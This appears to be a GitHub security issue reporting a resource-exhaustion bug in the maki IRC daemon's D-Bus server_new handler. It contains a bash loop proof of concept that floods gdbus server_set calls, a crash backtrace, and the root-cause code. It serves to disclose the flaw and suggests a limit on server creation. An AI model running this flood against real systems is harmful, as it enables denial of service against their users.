Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security Issue: Resource Exhaustion on server_new #2

Open
junorouse opened this issue Sep 22, 2020 · 0 comments
Open

Security Issue: Resource Exhaustion on server_new #2

junorouse opened this issue Sep 22, 2020 · 0 comments

Comments

@junorouse
Copy link

junorouse commented Sep 22, 2020
edited
Loading

Trigger

#!/bin/bash
for i in {1..3000}
do
	gdbus call -e -d ":1.$1" -o /de/ikkoku/sushi -m de.ikkoku.sushi.server_set -- "DDDDD-$i" "B" "C" "hello"
done
(maki:107326): GLib-WARNING **: 05:14:12.923: getpwuid_r(): failed due to unknown user id (1000)
[New Thread 0x7ffdbd41a700 (LWP 110744)]

(maki:107326): GLib-ERROR **: 05:14:12.943: Creating pipes for GWakeup: Too many open files.

Thread 1 "maki" received signal SIGTRAP, Trace/breakpoint trap.
0x00007ffff7cd4c75 in ?? () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
(gdb) bt
#0  0x00007ffff7cd4c75 in  () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#1  0x00007ffff7cd5d0d in g_log_default_handler () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#2  0x00007ffff7cd5f5f in g_logv () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#3  0x00007ffff7cd614f in g_log () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#4  0x00007ffff7d14a4a in  () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#5  0x00007ffff7ccc703 in g_main_context_new () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#6  0x000055555556cdd2 in maki_server_new ()
#7  0x0000555555560da8 in maki_dbus_server_set ()
#8  0x0000555555562599 in maki_dbus_server_message_handler ()
#9  0x00007ffff7eeb379 in  () at /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#10 0x00007ffff7ccedd8 in g_main_context_dispatch () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#11 0x00007ffff7ccf1c8 in  () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#12 0x00007ffff7ccf4c2 in g_main_loop_run () at /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#13 0x000055555555e1f1 in main ()

Root Cause

maki/source/server.c

Lines 633 to 653 in 1f8340a

makiServer*
maki_server_new (gchar const* name)
{
GNetworkMonitor* network_monitor;
gchar* nick;
gchar* path;
gchar** group;
gchar** groups;
makiServer* serv;
g_return_val_if_fail(name != NULL, NULL);
serv = g_new(makiServer, 1);
serv->instance = maki_instance_get_default();
serv->name = g_strdup(name);
serv->key_file = g_key_file_new();
serv->status = MAKI_SERVER_STATUS_DISCONNECTED;
serv->logged_in = FALSE;
serv->reconnect.source = 0;
serv->reconnect.retries = maki_instance_config_get_integer(serv->instance, "reconnect" ,"retries");
serv->sources.away = 0;

it should set max count for creating servers.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@junorouse